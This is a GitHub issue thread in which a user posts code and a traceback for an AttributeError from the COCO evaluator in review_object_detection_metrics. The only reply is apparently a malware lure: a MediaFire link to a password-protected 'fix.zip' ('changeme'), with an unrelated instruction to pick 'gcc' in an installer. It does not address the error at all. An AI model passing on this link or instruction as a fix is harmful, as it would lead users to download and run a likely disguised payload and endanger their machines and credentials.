### ISSUE TITLE
Trying to use the COCODatasets Evaluation 

### ISSUE THREAD

**Issue by pawan-fuse** [rafaelpadilla/review_object_detection_metrics#150]
So i have the datasets and predictions as request by the cocodataset format and when i try to run the following code 

import json
from math import isclose

import sys 
sys.path.append("review_object_detection_metrics/")
from src.bounding_box import BBFormat, BBType, BoundingBox
from src.evaluators.coco_evaluator import get_coco_summary
from src.utils.converter import coco2bb

# Load coco samples
gts = coco2bb('gts', BBType.GROUND_TRUTH)
dts = coco2bb('dets', BBType.DETECTED)
res = get_coco_summary(gts, dts)

I get this error : 

Traceback (most recent call last):

  File "github-repo/eval.py", line 12, in <module>
    dts = coco2bb('dets', BBType.DETECTED)
  File "github-repo/review_object_detection_metrics/src/utils/converter.py", line 31, in coco2bb
    if not validations.is_coco_format(file_path):
  File "github-repo/review_object_detection_metrics/src/utils/validations.py", line 302, in is_coco_format
    return is_json(file_path) and json_contains_tags(file_path, [
  File "github-repo/review_object_detection_metrics/src/utils/validations.py", line 115, in json_contains_tags
    for key, item in json_object.items():
AttributeError: 'list' object has no attribute 'items'

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
